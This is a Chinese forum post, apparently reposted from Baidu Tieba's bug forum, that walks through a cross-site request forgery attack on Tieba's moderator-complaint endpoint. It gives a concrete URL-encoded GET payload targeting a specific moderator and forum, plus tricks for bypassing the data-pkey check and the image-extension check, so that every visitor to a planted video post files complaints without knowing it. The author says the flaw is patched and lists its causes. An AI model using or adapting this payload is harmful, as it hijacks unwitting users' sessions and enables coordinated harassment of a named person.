百度贴吧csrf让全吧吧友在自己都不知情的情况下帮你投诉指定贴吧吧主的bug

下面教程开始，比如说我想投诉某吧的某吧主，先填好投诉表单如图


此时此刻按f12，定位到network，按底下那个clear按钮，然后抓到数据包


这是数据包


找到form data这里，然后点view source把格式化的post数据转化为URLencode数据


也就是这个样子



这是投诉的接口

构造csrf的payload（有效载荷）为http://tieba.baidu.com/pmc/tousu/commitTousu?然后加上前面那个post数据也就是
manager_uid=725070526&manager_uname=%25E9%25AB%25987192&forum_id=7993&forum_name=%25E5%25BF%2583%25E7%2590%2586%25E5%25AD%25A6&complaint_type=illegal&reason=%25E5%2588%25B6%25E5%25AE%259A%25E5%2590%2584%25E7%25A7%258D%25E4%25B8%258D%25E5%2590%2588%25E7%2590%2586%25E7%259A%2584%25E5%2590%25A7%25E8%25A7%2584%25EF%25BC%258C%25E7%25BA%25B5%25E5%25AE%25B9%25E6%259F%2590%25E4%25BA%259B%25E6%259C%2589%25E5%2581%25BF%25E6%2594%25B6%25E8%25B4%25B9%25E5%25BF%2583%25E7%2590%2586%25E5%2592%25A8%25E8%25AF%25A2%25E6%259C%25BA%25E6%259E%2584%25E5%258F%2591%25E5%25B8%2583%25E5%25B9%25BF%25E5%2591%258A%25E3%2580%2582

（请把上面那一段进行urldecode解码）

最终构造为


然后发一个视频，然后审查元素


把data-pkey删除一位，然后再把data-vpic改为刚才构造好的payload，然后接着在末尾加上&.jpg目的是为了绕过百度对data-vpic的末尾参数是否为jpg图片格式的检测。然后把这个帖子发出去，所有访问此贴或者本帖在贴吧首页的时候所有电脑版贴吧访问本吧的时候都会自动帮你投诉一次你指定的那个吧的吧主。

这个方法已死，但是重要的是思路。

这次攻击能成功的几个关键因素：

贴吧投诉接口虽然在百度的web前端代码里面默认是以post提交，但是事实上经过我测试发现也可以get提交。
投诉表单没有tbs（百度贴吧专用的csrf防御token）验证。
百度贴吧发视频的vpic-pkey验证逻辑有问题可以通过删除一位来绕过。
data-vpic参数可以自定义为百度站内的链接并且可以通过加上&.jpg绕过扩展名检测

好了，就说这么多了，这就是一次成功的csrf利用。

原帖在bug吧首发http://tieba.baidu.com/p/3769861364 转载请注明出处以及作者@昌维001
谢谢！~